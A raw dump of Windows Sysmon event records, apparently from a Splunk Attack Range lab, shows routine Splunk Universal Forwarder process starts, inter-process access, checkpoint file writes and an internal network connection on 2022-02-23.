Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DF228D70FF1B3CF17024ECF876CAE36,SHA256=C43637EADC9B7A703D85A4EB39CBE3CBF3DC3F399CC3E765E2690A3CBFC27045,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:17.715{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49606-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000299355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.403{C8EA50B7-1A17-6216-7907-000000003802}16404456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A17-6216-7907-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A17-6216-7907-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.156{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A17-6216-7907-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.158{C8EA50B7-1A17-6216-7907-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A7FE584B4F1C3A8706F7DDD0D9892D,SHA256=82B4CC3D044922B50CFD7A98024CD1D6BC86F4FA7F31F8F9106BE2074DFA6DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:20.158{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618A118D9CB65F3755348AF496B9609F,SHA256=127F680B2BEC00E1D2D9726E84B8F9E186DEC40905F0E663F2DCCBF64D57A58D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.656{C8EA50B7-1A18-6216-7B07-000000003802}64086896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.439{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A18-6216-7B07-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.437{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.437{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1A18-6216-7B07-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.437{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.437{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.437{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.436{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A18-6216-7B07-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.435{C8EA50B7-1A18-6216-7B07-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:20.036{C8EA50B7-1A17-6216-7A07-000000003802}9004780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.787{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C54DD56025B00B6EA08F8DC39E3CA805,SHA256=3205B0114E075FBE06E25126888541F67DFD8553BF2C890B899ADE3EC78737EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:21.158{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C19ACF5E5088E69930E5A72E0AE340,SHA256=CD63BF68AA8DE0CB1C3A48CBC64C53F13BBD2D159CBC6EEB4F857275BEDE9AA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A19-6216-7C07-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A19-6216-7C07-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.103{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A19-6216-7C07-000000003802}6872C:\Program 